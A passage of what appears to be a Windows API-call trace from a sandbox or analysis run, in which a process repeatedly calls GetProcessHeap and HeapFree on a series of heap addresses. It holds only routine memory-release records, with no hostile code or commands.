GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0b30 | out: hHeap=0x2d0000) returned 1 [0196.235] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0b50 | out: hHeap=0x2d0000) returned 1 [0196.235] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0b70 | out: hHeap=0x2d0000) returned 1 [0196.235] GetProcessHeap () returned 0x2d0000 [0196.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0b90 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0bb0 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0bd0 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0bf0 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0c10 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0c30 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0c50 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0c70 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0c90 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0cb0 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0cd0 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0cf0 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0d10 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0d30 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0d50 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0d70 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0d90 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0db0 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0dd0 | out: hHeap=0x2d0000) returned 1 [0196.236] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0df0 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0e10 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0e30 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0e50 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0e70 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0e90 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0eb0 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0ed0 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0ef0 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0f10 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0f30 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0f50 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0f70 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0f90 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0fb0 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0fd0 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f0ff0 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1010 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1030 | out: hHeap=0x2d0000) returned 1 [0196.237] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1090 | out: hHeap=0x2d0000) returned 1 [0196.238] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f10b0 | out: hHeap=0x2d0000) returned 1 [0196.238] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f10d0 | out: hHeap=0x2d0000) returned 1 [0196.238] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f10f0 | out: hHeap=0x2d0000) returned 1 [0196.238] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1110 | out: hHeap=0x2d0000) returned 1 [0196.238] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1130 | out: hHeap=0x2d0000) returned 1 [0196.238] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1150 | out: hHeap=0x2d0000) returned 1 [0196.238] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1170 | out: hHeap=0x2d0000) returned 1 [0196.238] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1190 | out: hHeap=0x2d0000) returned 1 [0196.238] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f11b0 | out: hHeap=0x2d0000) returned 1 [0196.238] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f11d0 | out: hHeap=0x2d0000) returned 1 [0196.238] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f11f0 | out: hHeap=0x2d0000) returned 1 [0196.238] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1210 | out: hHeap=0x2d0000) returned 1 [0196.238] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1230 | out: hHeap=0x2d0000) returned 1 [0196.238] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1250 | out: hHeap=0x2d0000) returned 1 [0196.238] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1270 | out: hHeap=0x2d0000) returned 1 [0196.238] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1290 | out: hHeap=0x2d0000) returned 1 [0196.238] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f12b0 | out: hHeap=0x2d0000) returned 1 [0196.238] GetProcessHeap () returned 0x2d0000 [0196.238] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f12d0 | out: hHeap=0x2d0000) returned 1 [0196.239] GetProcessHeap () returned 0x2d0000 [0196.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f12f0 | out: hHeap=0x2d0000) returned 1 [0196.239] GetProcessHeap () returned 0x2d0000 [0196.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1310 | out: hHeap=0x2d0000) returned 1 [0196.239] GetProcessHeap () returned 0x2d0000 [0196.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1330 | out: hHeap=0x2d0000) returned 1 [0196.239] GetProcessHeap () returned 0x2d0000 [0196.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1350 | out: hHeap=0x2d0000) returned 1 [0196.239] GetProcessHeap () returned 0x2d0000 [0196.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1370 | out: hHeap=0x2d0000) returned 1 [0196.239] GetProcessHeap () returned 0x2d0000 [0196.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1390 | out: hHeap=0x2d0000) returned 1 [0196.239] GetProcessHeap () returned 0x2d0000 [0196.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f13b0 | out: hHeap=0x2d0000) returned 1 [0196.239] GetProcessHeap () returned 0x2d0000 [0196.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f13d0 | out: hHeap=0x2d0000) returned 1 [0196.239] GetProcessHeap () returned 0x2d0000 [0196.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f13f0 | out: hHeap=0x2d0000) returned 1 [0196.239] GetProcessHeap () returned 0x2d0000 [0196.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1410 | out: hHeap=0x2d0000) returned 1 [0196.239] GetProcessHeap () returned 0x2d0000 [0196.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1430 | out: hHeap=0x2d0000) returned 1 [0196.239] GetProcessHeap () returned 0x2d0000 [0196.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1450 | out: hHeap=0x2d0000) returned 1 [0196.239] GetProcessHeap () returned 0x2d0000 [0196.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1470 | out: hHeap=0x2d0000) returned 1 [0196.239] GetProcessHeap () returned 0x2d0000 [0196.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1490 | out: hHeap=0x2d0000) returned 1 [0196.239] GetProcessHeap () returned 0x2d0000 [0196.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f14b0 | out: hHeap=0x2d0000) returned 1 [0196.239] GetProcessHeap () returned 0x2d0000 [0196.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f14d0 | out: hHeap=0x2d0000) returned 1 [0196.239] GetProcessHeap () returned 0x2d0000 [0196.239] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f14f0 | out: hHeap=0x2d0000) returned 1 [0196.239] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1510 | out: hHeap=0x2d0000) returned 1 [0196.240] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1530 | out: hHeap=0x2d0000) returned 1 [0196.240] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1550 | out: hHeap=0x2d0000) returned 1 [0196.240] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1570 | out: hHeap=0x2d0000) returned 1 [0196.240] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1590 | out: hHeap=0x2d0000) returned 1 [0196.240] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f15b0 | out: hHeap=0x2d0000) returned 1 [0196.240] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f15d0 | out: hHeap=0x2d0000) returned 1 [0196.240] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f15f0 | out: hHeap=0x2d0000) returned 1 [0196.240] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1610 | out: hHeap=0x2d0000) returned 1 [0196.240] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1630 | out: hHeap=0x2d0000) returned 1 [0196.240] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1650 | out: hHeap=0x2d0000) returned 1 [0196.240] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1670 | out: hHeap=0x2d0000) returned 1 [0196.240] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1690 | out: hHeap=0x2d0000) returned 1 [0196.240] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f16b0 | out: hHeap=0x2d0000) returned 1 [0196.240] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f16d0 | out: hHeap=0x2d0000) returned 1 [0196.240] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f16f0 | out: hHeap=0x2d0000) returned 1 [0196.240] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1710 | out: hHeap=0x2d0000) returned 1 [0196.240] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1730 | out: hHeap=0x2d0000) returned 1 [0196.240] GetProcessHeap () returned 0x2d0000 [0196.240] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1750 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1770 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1790 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f17b0 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f17d0 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f17f0 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1810 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1830 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1890 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f18b0 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f18d0 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f18f0 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1910 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1930 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1950 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1970 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1990 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f19b0 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f19d0 | out: hHeap=0x2d0000) returned 1 [0196.241] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f19f0 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1a10 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1a30 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1a50 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1a70 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1a90 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1ab0 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1ad0 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1af0 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1b10 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1b30 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1b50 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1b70 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1b90 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1bb0 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1bd0 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1bf0 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1c10 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1c30 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.242] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1c50 | out: hHeap=0x2d0000) returned 1 [0196.242] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1c70 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1c90 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1cb0 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1cd0 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1cf0 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1d10 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1d30 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1d50 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1d70 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1d90 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1db0 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1dd0 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1df0 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1e10 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1e30 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1e50 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1e70 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1e90 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.243] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1eb0 | out: hHeap=0x2d0000) returned 1 [0196.243] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1ed0 | out: hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1ef0 | out: hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1f10 | out: hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1f30 | out: hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1f50 | out: hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1f70 | out: hHeap=0x2d0000) returned 1 [0196.244] GetProcessHeap () returned 0x2d0000 [0196.244] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f1f90 | out: 